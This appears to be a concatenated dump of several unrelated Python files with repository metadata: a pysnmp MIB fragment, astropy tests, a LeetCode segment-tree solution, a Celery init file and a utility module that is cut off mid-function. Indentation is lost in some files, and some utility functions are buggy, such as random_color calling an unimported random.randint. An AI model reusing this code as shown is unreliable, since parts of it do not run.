chrComPmOpticsMin = MibTableColumn((1, 3, 6, 1, 4, 1, 3695, 1, 10, 1, 11, 1, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: chrComPmOpticsMin.setStatus('current')
chrComPmOpticsSD = MibTableColumn((1, 3, 6, 1, 4, 1, 3695, 1, 10, 1, 11, 1, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: chrComPmOpticsSD.setStatus('current')
mibBuilder.exportSymbols("ChrComPmOpticsOMS-SRC-Interval-MIB", chrComPmOpticsSES=chrComPmOpticsSES, chrComPmOpticsSuspectedIntrvl=chrComPmOpticsSuspectedIntrvl, chrComPmOpticsMean=chrComPmOpticsMean, chrComPmOpticsMin=chrComPmOpticsMin, chrComPmOpticsORS=chrComPmOpticsORS, chrComPmOpticsOMS_SRC_IntervalEntry=chrComPmOpticsOMS_SRC_IntervalEntry, chrComPmOpticsSuppressedIntrvls=chrComPmOpticsSuppressedIntrvls, chrComPmOpticsUAS=chrComPmOpticsUAS, chrComPmOpticsElapsedTime=chrComPmOpticsElapsedTime, chrComPmOpticsMax=chrComPmOpticsMax, chrComPmOpticsOMS_SRC_IntervalTable=chrComPmOpticsOMS_SRC_IntervalTable, chrComPmOpticsIntervalNumber=chrComPmOpticsIntervalNumber, chrComPmOpticsSD=chrComPmOpticsSD)
| [
"dcwangmit01@gmail.com"
] | dcwangmit01@gmail.com |
ffda15de7089820556396da2ce8e685c3b9e6e91 | 62b75c03509dcd993a28eba2bb7004ae5f427f73 | /astropy/nddata/tests/test_flag_collection.py | 7ed4af6b0dcebb37473a2aebb7e4562660adce6a | [] | permissive | xiaomi1122/astropy | 08aba5592d9bb54e725708352e34db89af2ec289 | 8876e902f5efa02a3fc27d82fe15c16001d4df5e | refs/heads/master | 2020-04-09T12:27:36.768462 | 2018-12-06T01:11:23 | 2018-12-06T01:11:23 | 160,299,140 | 0 | 0 | BSD-3-Clause | 2018-12-04T04:52:22 | 2018-12-04T04:52:22 | null | UTF-8 | Python | false | false | 1,460 | py | # Licensed under a 3-clause BSD style license - see LICENSE.rst
from __future__ import absolute_import, division, print_function, unicode_literals
import numpy as np
from ...tests.helper import pytest
from .. import FlagCollection
def test_init():
FlagCollection(shape=(1, 2, 3))
def test_init_noshape():
with pytest.raises(Exception) as exc:
FlagCollection()
assert exc.value.args[0] == 'FlagCollection should be initialized with the shape of the data'
def test_init_notiterable():
with pytest.raises(Exception) as exc:
FlagCollection(shape=1.)
assert exc.value.args[0] == 'FlagCollection shape should be an iterable object'
def test_setitem():
f = FlagCollection(shape=(1, 2, 3))
f['a'] = np.ones((1, 2, 3)).astype(float)
f['b'] = np.ones((1, 2, 3)).astype(int)
f['c'] = np.ones((1, 2, 3)).astype(bool)
f['d'] = np.ones((1, 2, 3)).astype(str)
@pytest.mark.parametrize(('value'), [1, 1., 'spam', [1, 2, 3], (1., 2., 3.)])
def test_setitem_invalid_type(value):
f = FlagCollection(shape=(1, 2, 3))
with pytest.raises(Exception) as exc:
f['a'] = value
assert exc.value.args[0] == 'flags should be given as a Numpy array'
def test_setitem_invalid_shape():
f = FlagCollection(shape=(1, 2, 3))
with pytest.raises(Exception) as exc:
f['a'] = np.ones((3, 2, 1))
assert exc.value.args[0] == 'flags array shape (3, 2, 1) does not match data shape (1, 2, 3)'
| [
"thomas.robitaille@gmail.com"
] | thomas.robitaille@gmail.com |
72a5ea65e3d05e179ebf71c80191e2fe5820c5fa | bda892fd07e3879df21dcd1775c86269587e7e07 | /leetcode/0307_M_区域和检索 - 数组可修改_线段树.py | 612a279505a8bc32f9fedd8413e5da5368b70c77 | [] | no_license | CrzRabbit/Python | 46923109b6e516820dd90f880f6603f1cc71ba11 | 055ace9f0ca4fb09326da77ae39e33173b3bde15 | refs/heads/master | 2021-12-23T15:44:46.539503 | 2021-09-23T09:32:42 | 2021-09-23T09:32:42 | 119,370,525 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,030 | py | '''
Given an integer array nums, handle two types of queries: one updates the
value at a given index, the other returns the sum of the elements in a
given range.

Implement the NumArray class:

NumArray(int[] nums) initializes the object with the integer array nums
void update(int index, int val) updates the value of nums[index] to val
int sumRange(int left, int right) returns the sum of the subarray
nums[left..right] (i.e. nums[left] + nums[left + 1] + ... + nums[right])

Example:

Input:
["NumArray", "sumRange", "update", "sumRange"]
[[[1, 3, 5]], [0, 2], [1, 2], [0, 2]]
Output:
[null, 9, null, 8]

Explanation:
NumArray numArray = new NumArray([1, 3, 5]);
numArray.sumRange(0, 2); // returns 9, sum([1,3,5]) = 9
numArray.update(1, 2);   // nums = [1,2,5]
numArray.sumRange(0, 2); // returns 8, sum([1,2,5]) = 8

Constraints:

1 <= nums.length <= 3 * 10^4
-100 <= nums[i] <= 100
0 <= index < nums.length
-100 <= val <= 100
0 <= left <= right < nums.length
At most 3 * 10^4 calls in total to update and sumRange
'''
from typing import List
from leetcode.tools.tree import showTree, buildTree
class NumArray:
'''
    Segment tree
'''
def __init__(self, nums: List[int]):
self.len = len(nums)
'''
        length is 2n
'''
self.tree = [0 for _ in range(2 * self.len)]
'''
        leaf nodes (the original data) are stored at [n, 2n - 1]
'''
self.tree[self.len:] = nums
'''
        internal node i has left child 2 * i and right child 2 * i + 1
'''
for i in range(self.len - 1, 0, -1):
self.tree[i] = self.tree[i * 2] + self.tree[i * 2 + 1]
'''
    update starting from the leaf node at n + index
'''
def update(self, index: int, val: int) -> None:
index = index + self.len
self.tree[index] = val
        while index > 1:  # stop once the root (index 1) is refreshed; tree[0] is unused
left = index
right = index
if left % 2 == 0:
right += 1
else:
left -= 1
index = left // 2
self.tree[index] = self.tree[left] + self.tree[right]
'''
    compute the sum over the inclusive range [left, right]
'''
def sumRange(self, left: int, right: int) -> int:
left += self.len
right += self.len
sum = 0
while left <= right:
'''
            left is a right child: add its value, then move one step right
'''
if left % 2 == 1:
sum += self.tree[left]
left += 1
'''
            right is a left child: add its value, then move one step left
'''
if right % 2 == 0:
sum += self.tree[right]
right -= 1
left //= 2
right //= 2
return sum
numArray = NumArray([1, 3, 5])
print(numArray.sumRange(0, 2), numArray.update(1, 2), numArray.sumRange(0, 2))
showTree(buildTree([i for i in range(1, 10)]))
'''
1
2 3
4 5 6 7
8 9 . . . . . .
'''
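For reference, a standalone copy of the same iterative segment-tree layout (class name `SegTreeSum` is illustrative) that can be exercised without the `leetcode.tools` helpers:

```python
class SegTreeSum:
    """Standalone copy of the iterative segment-tree layout above."""

    def __init__(self, nums):
        self.n = len(nums)
        self.tree = [0] * (2 * self.n)
        self.tree[self.n:] = nums              # leaves hold the raw data
        for i in range(self.n - 1, 0, -1):     # parents are pairwise sums
            self.tree[i] = self.tree[2 * i] + self.tree[2 * i + 1]

    def update(self, index, val):
        i = index + self.n
        self.tree[i] = val
        while i > 1:                           # bubble the change up to the root
            i //= 2
            self.tree[i] = self.tree[2 * i] + self.tree[2 * i + 1]

    def query(self, left, right):
        # inclusive range sum over [left, right]
        left += self.n
        right += self.n
        total = 0
        while left <= right:
            if left % 2 == 1:                  # left is a right child: take it, step right
                total += self.tree[left]
                left += 1
            if right % 2 == 0:                 # right is a left child: take it, step left
                total += self.tree[right]
                right -= 1
            left //= 2
            right //= 2
        return total


tree = SegTreeSum([2, 4, 6, 8, 10])
print(tree.query(1, 3))  # 18
tree.update(2, 0)
print(tree.query(0, 4))  # 24
```

Both update and query touch O(log n) nodes, which is what makes this structure preferable to a plain prefix-sum array when updates are frequent.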
| [
"1016864609@qq.com"
] | 1016864609@qq.com |
6f28896faeb0e9fe47f882df32f74ded478ad885 | 7ae0f100b49763f79b276260bbc0e87bd904da3e | /src/app/__init__.py | 5b98b0a760bd15666f075779f5753aab40f11762 | [] | no_license | wondersell/wildsearch-indexer | d88a5b3bce17acc1cb61d365f55ab5d9f63f61ae | 67d5f29f6d405c055cfa211ddf0b70521382a671 | refs/heads/master | 2023-07-19T00:33:34.371231 | 2020-12-31T11:20:00 | 2020-12-31T11:20:00 | 285,488,583 | 2 | 0 | null | 2021-07-19T06:26:44 | 2020-08-06T06:09:51 | Python | UTF-8 | Python | false | false | 174 | py | # This will make sure the app is always imported when
# Django starts so that shared_task will use this app.
from .celery import celery # noqa: ABS101
__all__ = ['celery']
| [
"artem.kiselev@gmail.com"
] | artem.kiselev@gmail.com |
adc0635f574f63d92b902ca2d499b1a9ad040a7f | 679ce4b323f79b2425976201324c6c1f88b95199 | /Python/Income Visualizer/utility.py | 3f033f36de6b4d08bcf30b93fbaa67394dc0c784 | [] | no_license | abriggs914/Coding_Practice | ff690fb5f145a11f4da144f3882b37f473b10450 | 3afd7c59e0d90f0ef5f6203853e69f853312019b | refs/heads/master | 2023-08-31T04:04:58.048554 | 2023-08-29T13:23:29 | 2023-08-29T13:23:29 | 161,865,421 | 0 | 1 | null | 2022-10-27T08:35:29 | 2018-12-15T03:20:14 | Python | UTF-8 | Python | false | false | 51,770 | py | from locale import currency, setlocale, LC_ALL
from math import e, ceil, sin, cos, radians
from random import random, choice
import datetime as dt
import shutil
import sys
import os
"""
General Utility Functions
Version..............1.28
Date...........2021-10-07
Author.......Avery Briggs
"""
def func_def():
pass
class Foo:
def __init__(self):
pass
def f1(self):
pass
def f2(self, f):
pass
FOO_OBJ = Foo()
def isfunc(f):
return isinstance(f, type(func_def))
def isclassmethod(m):
return isinstance(m, type(FOO_OBJ.f1))
def lenstr(x):
return len(str(x))
def minmax(a, b):
if a <= b:
return a, b
return b, a
def avg(lst):
try:
return sum(lst) / max(1, len(lst))
except TypeError:
return 0
def median(lst):
if not isinstance(lst, list) and not isinstance(lst, str):
raise TypeError("Cannot find median of \"{}\" of type: \"{}\".".format(lst, type(lst)))
if not lst:
return None
lt = lst.copy()
lt.sort()
l = len(lt)
if l == 1:
return lt
else:
h = l // 2
o = (l % 2) == 1
f = [] if o else lt[h - 1: h]
return f + lt[h: h + 1]
def mode(lst):
if not isinstance(lst, list) and not isinstance(lst, str):
raise TypeError("Cannot find mode of \"{}\" of type: \"{}\".".format(lst, type(lst)))
d = {}
mv = float("-inf")
for el in lst:
if el in d:
v = d[el] + 1
else:
v = 1
d[el] = v
if v > mv:
mv = v
return [k for k, v in d.items() if v == mv]
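`mode` above hand-rolls the frequency count; an equivalent sketch using `collections.Counter` (keeping the return-all-ties behavior, with `mode_counter` as an illustrative name) for comparison:

```python
from collections import Counter

def mode_counter(lst):
    # returns every value that reaches the highest frequency,
    # preserving first-seen order, like mode() above
    if not lst:
        return []
    counts = Counter(lst)
    top = max(counts.values())
    return [value for value, count in counts.items() if count == top]

print(mode_counter([1, 2, 2, 3, 3]))  # [2, 3]
```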
def pad_centre(text, l, pad_str=" "):
if l > 0:
h = (l - len(text)) // 2
odd = (((2 * h) + len(text)) == l)
text = text.rjust(h + len(text), pad_str)
h += 1 if not odd else 0
text = text.ljust(h + len(text), pad_str)
return text
else:
return ""
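A small usage sketch of `pad_centre` (self-contained copy of the definition above); note that when the padding cannot be split evenly, the extra pad character goes to the right:

```python
def pad_centre(text, l, pad_str=" "):
    # copy of the helper above: centre text in a field of width l
    if l > 0:
        h = (l - len(text)) // 2
        odd = (((2 * h) + len(text)) == l)
        text = text.rjust(h + len(text), pad_str)
        h += 1 if not odd else 0
        text = text.ljust(h + len(text), pad_str)
        return text
    else:
        return ""

print(pad_centre("ab", 7, "-"))   # --ab---
print(pad_centre("abc", 9, "."))  # ...abc...
```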
def text_size(txt):
spl = txt.split("\n")
return len(spl), max([len(line) for line in spl])
# Function returns a formatted string containing the contents of a dict object.
# Special lines and line count for values that are lists.
# Supports dictionaries with special value types.
# Lists are printed line by line, but the counting index is constant for all elements. - Useful for ties.
# Dicts are represented by a table which will dynamically generate a header and appropriately format cell values.
# Strings, floats, ints, bools are simply converted to their string representations.
# d - dict object.
# n - Name of the dict, printed above the contents.
# number - Decide whether to number the content lines.
# l - Minimum number of chars in the content line.
# Spaces between keys and values are populated by marker.
# sep - Additional separation between keys and values.
# marker - Char that separates the key and value of a content line.
# sort_header - Will alphabetically sort the header line if any value is a
# dictionary. Only one level of nesting supported.
# min_encapsulation - If a table is necessary because of a value that is a
# dictionary, then opt to keep all column widths as small as
# possible. This will most likely produce varying widths.
# table_title - If a table is created, then display the title in the first
# column directly above the row names.
def dict_print(d, n="Untitled", number=False, l=15, sep=5, marker=".", sort_header=False, min_encapsulation=True,
table_title="", TAB=" ", SEPARATOR=" - ", TABLE_DIVIDER="|"):
if not d or not n or type(d) != dict:
return "None"
m = "\n{}-- ".format(TAB[:len(TAB) // 2]) + str(n).title() + " --\n\n"
fill = 0
# max_key = max([len(str(k)) + ((2 * len(k) + 2 + len(k) - 1) if type(k) == (list or tuple) else 0) for k in d.keys()])
# max_val = max([max([len(str(v_elem)) for v_elem in v]) if type(v) == (list or tuple) else len(str(v)) if type(v) != dict else 0 for v in d.values()])
# fill += sum([len(v) for v in d.values() if type(v) == (list or tuple)])
# l = max(l, (max_key + max_val)) + sep
# has_dict = [(k, v) for k, v in d.items() if type(v) == dict]
# has_list = any([1 if type(v) in [list, tuple] else 0 for v in d.values()])
max_key = float("-inf")
max_val = float("-inf")
fill = float("-inf")
l = float("-inf")
has_dict = False
has_list = False
for k, v in d.items():
max_key = max((len(str(k)) + ((2 * len(k) + 2 + len(k) - 1) if type(k) == (list or tuple) else 0)), max_key)
max_val = max((max([len(str(v_elem)) for v_elem in v] if v else [0]) if (
(type(v) == list) or (type(v) == tuple)) else len(
str(v)) if type(v) != dict else 0), max_val)
l = max(len(table_title), max(l, (max_key + max_val))) + sep
has_dict = [(k, v) for k, v in d.items() if type(v) == dict or (type(v) == list and v and type(v[0]) == dict)]
has_list = any([1 if type(v) in [list, tuple] else 0 for v in d.values()])
header = []
max_cell = 0
max_cell_widths = []
# print("has_dict: {hd}".format(hd=has_dict))
if has_list:
number = True
for k1, v in has_dict:
for k2 in v:
key = str(k2)
# print("key: {k}".format(k=key))
if key not in header:
if type(v) == dict:
# print("\t\tNew key: {k}".format(k=key))
header.append(key)
max_cell = max(max_cell, max(len(key), max([lenstr(value) for value in v.values()])))
# print("max_cell: {mc}".format(mc=max_cell))
elif type(k2) == dict:
strkeys = list(map(str, list(k2.keys())))
strvals = list(map(str, list(k2.values())))
header += [strkey for strkey in strkeys if strkey not in header]
max_cell = max(max_cell, max(list(map(len, strkeys))), max(list(map(len, strvals))))
else:
for lst in v:
a = max(list(map(lenstr, list(map(str, lst.keys())))))
b = max(list(map(lenstr, list(map(str, lst.values())))))
# print("a: {a}, b: {b}, values: {v}".format(a=a, b=b, v=lst.values()))
max_cell = max(max_cell, max(a, b))
max_cell += 2
# print("max_cell: {mc}".format(mc=max_cell))
if sort_header:
header.sort(key=lambda x: x.rjust(max_cell))
if min_encapsulation:
for h in header:
max_col_width = len(h) + 2
# print("h: {h}, type(h): {th}".format(h=h, th=type(h)))
for k, d_val in has_dict:
d_val = {str(d_val_k): str(d_val_v) for d_val_k, d_val_v in d_val.items()} if type(
d_val) == dict else d_val
# print("d_val: {dv},\thidv: {hidv},\tetdvlist: {etdvl}".format(dv=d_val, hidv=(h in d_val), etdvl=(type(d_val) == list)))
# print("k: {k}\nt(k): {tk}\nd: {d}\nt(d): {td}".format(k=k, tk=type(k), d=d_val, td=type(d_val)))
if h in d_val:
max_col_width = max(max_col_width, lenstr(d_val[h]) + 2)
elif type(d_val) == list:
max_col_width = max(max_col_width, max([max(
max(list(map(lenstr, [ek for ek in elem.keys() if ek == h]))),
max(list(map(lenstr, [ev for ek, ev in elem.items() if ek == h]))) + 2) for elem in d_val]))
max_cell_widths.append(max_col_width)
# print("max_cell_widths: {mcw}".format(mcw=max_cell_widths))
table_header = TABLE_DIVIDER + TABLE_DIVIDER.join(
map(lambda x: pad_centre(str(x), max_cell), header)) + TABLE_DIVIDER
empty_line = TABLE_DIVIDER + TABLE_DIVIDER.join(
[pad_centre(" ", max_cell) for i in range(len(header))]) + TABLE_DIVIDER
if min_encapsulation:
table_header = TABLE_DIVIDER + TABLE_DIVIDER.join(
[pad_centre(str(h), max_cell_widths[i]) for i, h in enumerate(header)]) + TABLE_DIVIDER
empty_line = TABLE_DIVIDER + TABLE_DIVIDER.join(
[pad_centre(" ", max_cell_widths[i]) for i in range(len(header))]) + TABLE_DIVIDER
else:
max_cell_widths = [max_cell for i in range(len(header))]
# print("Header: {h}\nTable Header: {th}".format(h=header, th=table_header))
fill = "".join([" " for i in range(len(str(fill + len(d))))])
table_width = l + len(fill) + len(SEPARATOR) + len(TAB) + len(table_header) - (4 * len(TABLE_DIVIDER))
table_tab = "".join([marker for i in range(len(TAB))])
if has_dict:
table_header_title = pad_centre(table_title, l + len(SEPARATOR) - 1)
m += TAB
m += "" if not number else fill + SEPARATOR
m += table_header_title + table_header.rjust(
table_width - len(table_header_title) - len(fill) - len(SEPARATOR)) + "\n"
i = 0
# print("FINAL L: {l}\nFill: {n}<{f}>".format(l=l, n=len(fill), f=fill))
for k, v in d.items():
if type(v) not in [list, tuple]:
v = [v]
for j, v_elem in enumerate(v):
ml = str(k).strip()
orig_ml = ml
num = str(i + 1)
if number:
ml = fill + SEPARATOR + ml
if j == 0:
ml = num.ljust(len(fill)) + ml[len(fill):]
v_val = v_elem
if has_dict and type(v_elem) == dict:
v_val = ""
ml += str(v_val).rjust(l - len(orig_ml), marker)
if has_dict:
ml += table_tab
if type(v_elem) == dict:
keys = {str(k).strip(): v for k, v in v_elem.items()}
vals = [keys[key] if key in keys else "" for key in header]
ml += TABLE_DIVIDER + TABLE_DIVIDER.join(
pad_centre(str(cell), max_cell_widths[i]) for i, cell in enumerate(vals)) + TABLE_DIVIDER
else:
ml += empty_line
ml += "\n"
m += TAB + ml
i += 1
return m
def money(v, int_only=False):
# return "$ %.2f" % v
setlocale(LC_ALL, "")
m = currency(v, grouping=True)
i = m.index("$") + 1
if int_only:
return (m[:i] + " " + m[i:]).split(".")[0]
return m[:i] + " " + m[i:]
def money_value(m):
return float("".join(m[1:].split(",")))
def percent(v):
return ("%.2f" % (v * 100)) + " %"
def compute_min_edit_distance(a, b, show=False):
len_a = len(a)
len_b = len(b)
x = max(len_a, len_b)
s = b if x == len_a else a
m, instructions = min_edit_distance(a, b, show_table=show)
# print(instructions)
return m
def min_edit_distance(a, b, show_table=False):
a = a.upper()
b = b.upper()
n = len(a) + 2
m = len(b) + 2
table = [[0 for j in range(n)] for i in range(m)]
for i in range(2, max(n, m)):
if i < n:
table[0][i] = a[i - 2]
table[1][i] = i - 1
if i < m:
table[i][0] = b[i - 2]
table[i][1] = i - 1
for i in range(2, m):
for j in range(2, n):
x = table[i][j - 1]
y = table[i - 1][j - 1]
z = table[i - 1][j]
mini = min(x, min(y, z))
u = table[0][j]
v = table[i][0]
if u == v:
table[i][j] = table[i - 1][j - 1]
else:
# System.out.println("x: " + x + ", y: " + y + ", z: " + z + ", min(x, min(y, z): " + mini);
table[i][j] = mini + 1
if show_table:
show(table)
print("Minimum edit Distance to convert \"" + a + "\" to \"" + b + "\": " + str(table[m - 1][n - 1]))
return table[m - 1][n - 1], table
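The padded table built above is a standard Levenshtein dynamic program (unit cost for insert, delete, substitute); a compact two-row equivalent, useful for cross-checking results, might look like:

```python
def levenshtein(a, b):
    # prev[j] holds the edit distance between the processed prefix of a and b[:j]
    a, b = a.upper(), b.upper()  # match the case-folding done above
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                  # delete from a
                           cur[j - 1] + 1,               # insert into a
                           prev[j - 1] + (ca != cb)))    # substitute (free on match)
        prev = cur
    return prev[-1]

print(levenshtein("kitten", "sitting"))  # 3
```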
def show(arr):
res = "{"
for i in range(len(arr)):
res += "{"
if i > 0:
res += " "
for j in range(len(arr[i])):
if j < len(arr[i]) - 1:
if i == 0 or j == 0:
res += str(arr[i][j]) + ", "
else:
res += str(arr[i][j]) + ", "
else:
if i == 0 or j == 0:
res += str(arr[i][j])
else:
res += str(arr[i][j])
if i < len(arr) - 1:
res += "},\n"
else:
res += "}"
res += "}\n"
print(res)
def add_business_days(d, bd, holidays=None):
if holidays == None:
holidays = []
i = 0
t = dt.datetime(d.year, d.month, d.day)
# print("holidays: " + str(holidays))
while i < bd:
t = t + dt.timedelta(days=1)
# print("t: " + str(t) + ", (t not in holidays): " + str(t not in holidays))
if t.weekday() < 5 and t not in holidays:
i += 1
return t
def business_days_between(d1, d2, holidays=None):
business_days = 0
if holidays == None:
holidays = []
date_1 = d1 if type(d1) == dt.datetime else dt.datetime.strptime(d1, "%d-%b-%y")
date_2 = d2 if type(d2) == dt.datetime else dt.datetime.strptime(d2, "%d-%b-%y")
date_1, date_2 = minmax(date_1, date_2)
diff = (date_2 - date_1).days
temp = date_1
for i in range(diff):
temp = date_1 + dt.timedelta(days=i + 1)
if temp.weekday() < 5 and temp not in holidays: # Monday == 0, Sunday == 6
business_days += 1
i = 0
while temp.weekday() >= 5 or temp in holidays:
temp = temp + dt.timedelta(days=1)
if temp not in holidays:
business_days += 1
break
# print("temp: {temp}\ndate_2: {date_2}\ntemp < date_2: {td2}".format(temp=temp, date_2=date_2, td2=(temp < date_2)))
# print("business_days: " + str(business_days))
return business_days
def intersection(a, b):
res = []
l = a if len(a) >= len(b) else b
m = b if len(a) >= len(b) else a
for i in l:
if i in m:
res.append(i)
return res
def disjoint(a, b):
overlap = intersection(a, b)
res = []
for el in a + b:
if el not in overlap:
res.append(el)
return res
def isfloat(value):
try:
float(value)
return True
except ValueError:
return False
def isnumber(value):
if isinstance(value, int) or isinstance(value, float):
return True
if isinstance(value, str):
if value.count("-") < 2:
if value.replace("-", "").isnumeric():
return True
return False
def same_calendar_day(d1, d2):
    if not (isinstance(d1, dt.datetime) and isinstance(d2, dt.datetime)):
raise ValueError(
"Check types of d1: <{d1}> and d2: <{d2}>.\nBoth values must be datetime.datetime objects.".format(d1=d1,
d2=d2))
return all([
d1.year == d2.year,
d1.month == d2.month,
d1.day == d2.day
])
def pyth(a=None, b=None, c=None):
if all([a is None, b is None, c is None]):
return None
if c is None:
if a is not None and b is not None:
return {"a": a, "b": b, "c": (a ** 2 + b ** 2) ** 0.5}
elif a is None:
if b is not None and c is not None:
return {"a": (c ** 2 - b ** 2) ** 0.5, "b": b, "c": c}
elif b is None:
if a is not None and c is not None:
return {"a": a, "b": (c ** 2 - a ** 2) ** 0.5, "c": c}
return {"a": a, "b": b, "c": c}
def sigmoid(x):
return 1 / (1 + (e ** -x))
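# A quick sanity check of the logistic formula (restated here so the snippet
# runs on its own):

```python
from math import e

def sigmoid(x):
    return 1 / (1 + (e ** -x))

# Centered at 0.5, saturating toward 0 and 1 at the tails.
print(sigmoid(0))  # -> 0.5
```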
def random_in_range(a, b):
return ((max(a, b) - min(a, b)) * random()) + min(a, b)
def max_idx(lst):
max_val = None, float("-inf")
for i, el in enumerate(lst):
if el > max_val[1]:
max_val = i, el
return max_val
def min_idx(lst):
min_val = None, float("inf")
for i, el in enumerate(lst):
        if el < min_val[1]:
min_val = i, el
return min_val
# Usage:
# (val, weight) where weight is a float or integer.
# float weights must sum to 1 or less, indicating a percentage of 100.
# A whole integer will be considered as a ratio value.
# l1 = [(1, 0.7), (2, 0.3)] # '1' 70% of the time, '2' 30% of the time
# l2 = [(0, 0.05), (1, 0.05), (2, 0.05), (3, 0.1), (4, 0.2), (5, 0.05), (6, 10), (7, 2), (8, 3)]
# '0', '1', '2', '5' each appear 5% of the time, '3' 10%, '4' 20%, plus 10 counts of 6, 2 counts of 7, and 3 counts of 8.
# l3 = [("Avery", 5), ("Jordan", 15), ("Briggs", 2)]
# List of 5 counts of 'Avery', 15 counts of 'Jordan', and 2 counts of 'Briggs'
# weighted_choice(l1)
# Returns a random choice from a generated weighted list.
def weighted_choice(weighted_lst):
item_scalar = 10
lst_len = 1000
res = []
whole = []
fract = []
fract_sum = 0
sum_count = 0
for el in weighted_lst:
if isinstance(el, list) or isinstance(el, tuple):
if len(el) == 2:
val, weight = el
if str(weight).startswith("0."):
fract.append(el)
fract_sum += weight
sum_count += weight * lst_len
else:
whole.append(el)
# print("Whole:", whole)
# print("Fract:", fract)
if fract_sum > 1:
print("Fract:", fract)
        raise ValueError("Fractional weights must sum to 1 or less.")
remaining = lst_len - sum_count
remaining = remaining if remaining != 0 else 1
sum_whole = sum([weight for val, weight in whole])
sum_whole = sum_whole if sum_whole != 0 else 1
p = sum_whole / remaining
for val, weight in fract:
# print("item_scalar:", item_scalar, "p:", p, "weight:", weight, "lst_len:", lst_len)
s = ceil(item_scalar * p * weight * lst_len)
# print("\ts:", s)
res += [val for i in range(s)]
for val, weight in whole:
# print("{} x {}".format(weight, val))
res += [val for i in range(ceil(weight))]
# print("\tres", res)
if res:
# print("Choice from:\n\t{}".format(res))
return choice(res)
if isinstance(weighted_lst, list) or isinstance(weighted_lst, tuple):
# print("Choice from:\n\t{}".format(weighted_lst))
return choice(weighted_lst)
return None
# TODO - Broken test:
# weighted_choice([(1, 9), 2])
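# The weighting scheme described in the usage notes above can be sketched more
# directly; expand_weights below is a simplified, hypothetical stand-in
# (integer weights as raw counts, fractional weights scaled to a pool of 100),
# not the weighted_choice implementation itself:

```python
import random

def expand_weights(weighted, scale=100):
    # Expand (value, weight) pairs into a flat pool for uniform sampling.
    pool = []
    for value, weight in weighted:
        if isinstance(weight, float) and weight < 1:
            count = round(weight * scale)  # fraction of the pool
        else:
            count = int(weight)            # raw ratio count
        pool.extend([value] * count)
    return pool

pool = expand_weights([("Avery", 5), ("Jordan", 15), ("Briggs", 2)])
pick = random.choice(pool)  # "Jordan" is drawn about 15/22 of the time
```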
def lbs_kg(lbs):
"""
lbs_kg(args) -> int() or float()
Convert N pounds to Kilograms.
1 Lbs = 0.453592 Kg
:param lbs: int or float value in pounds.
:return: float value in kilograms.
"""
    if not isinstance(lbs, (int, float)):
raise ValueError("Cannot convert \"{}\" of type: \"{}\" to kilograms.".format(lbs, type(lbs)))
return 0.453592 * lbs
def kg_lbs(kg):
"""
kg_lbs(args) -> int() or float()
Convert N Kilograms to pounds.
1 Lbs = 0.453592 Kg
:param kg: int or float value in kilograms.
:return: float value in pounds.
"""
    if not isinstance(kg, (int, float)):
raise ValueError("Cannot convert \"{}\" of type: \"{}\" to pounds.".format(kg, type(kg)))
    return kg / 0.453592
def miles_km(miles):
"""
miles_km(args) -> int() or float()
Convert N Miles to Kilometers.
1 Mi = 1.60934 Km
:param miles: int or float value in miles.
:return: float value in kilometers.
"""
    if not isinstance(miles, (int, float)):
raise ValueError("Cannot convert \"{}\" of type: \"{}\" to miles.".format(miles, type(miles)))
return 1.60934 * miles
def km_miles(km):
"""
km_miles(args) -> int() or float()
Convert N Kilometers to Miles.
1 Mi = 1.60934 Km.
:param km: int or float value in kilometers.
:return: float value in miles.
"""
    if not isinstance(km, (int, float)):
raise ValueError("Cannot convert \"{}\" of type: \"{}\" to kilometers.".format(km, type(km)))
    return km / 1.60934
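# A round-trip check of the conversion factors used above (constants restated
# so the snippet is standalone):

```python
KG_PER_LB = 0.453592
KM_PER_MILE = 1.60934

def lbs_to_kg(lbs):
    return lbs * KG_PER_LB

def kg_to_lbs(kg):
    return kg / KG_PER_LB

# Converting out and back should recover the original value (up to float rounding).
round_trip = kg_to_lbs(lbs_to_kg(10.0))
```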
def flatten(lst):
"""
flatten(args) -> list()
Flatten a multi-dimensional list into a single dimension.
Non-list objects are returned in a list.
:param lst: list object with one or more dimensions.
:return: list object with one dimension.
"""
if not isinstance(lst, list):
return [lst]
if not lst:
return lst
return [*flatten(lst[0]), *flatten(lst[1:])]
# Clamp a number between small and large values.
# Inclusive on both ends.
def clamp(s, v, l):
return max(s, min(v, l))
# Darken an RGB color using a proportion p (0-1)
def darken(c, p):
r, g, b = c
r = clamp(0, round(r - (255 * p)), 255)
g = clamp(0, round(g - (255 * p)), 255)
b = clamp(0, round(b - (255 * p)), 255)
return r, g, b
# Brighten an RGB color using a proportion p (0-1)
def brighten(c, p):
r, g, b = c
r = clamp(0, round(r + (255 * p)), 255)
g = clamp(0, round(g + (255 * p)), 255)
b = clamp(0, round(b + (255 * p)), 255)
return r, g, b
# return random RGB color
def random_color():
return (
random.randint(10, 245),
random.randint(10, 245),
random.randint(10, 245)
)
# Rotate a 2D point about the origin by a given number of degrees, counterclockwise.
def rotate_on_origin(px, py, theta):
t = radians(theta)
x = (px * cos(t)) - (py * sin(t))
y = (px * sin(t)) + (py * cos(t))
return x, y
# Rotate a 2D point around any central point by a given number of degrees, counterclockwise.
def rotate_point(cx, cy, px, py, theta):
xd = 0 - cx
yd = 0 - cy
rx, ry = rotate_on_origin(px + xd, py + yd, theta)
return rx - xd, ry - yd
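# The rotation helpers above can be sanity-checked with known angles (formula
# restated so this runs standalone):

```python
from math import radians, sin, cos

def rotate_on_origin(px, py, theta):
    # Counterclockwise rotation about (0, 0).
    t = radians(theta)
    return (px * cos(t)) - (py * sin(t)), (px * sin(t)) + (py * cos(t))

# (1, 0) rotated 90 degrees CCW lands at (0, 1), up to float error.
x, y = rotate_on_origin(1, 0, 90)
```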
def bar(a, b, c=10):
if not isinstance(c, int) or c < 1:
c = 10
return "{} |".format(percent(a / b)) + "".join(["#" if i < int((c * a) / b) else " " for i in range(c)]) + "|"
def lstindex(lst, target):
for i, val in enumerate(lst):
if val == target:
return i
return -1
def cos_x(degrees, amplitude=1, period=1, phase_shift=0, vertical_shift=0):
return (amplitude * (cos(period * (degrees + phase_shift)))) + vertical_shift
def sin_x(degrees, amplitude=1, period=1, phase_shift=0, vertical_shift=0):
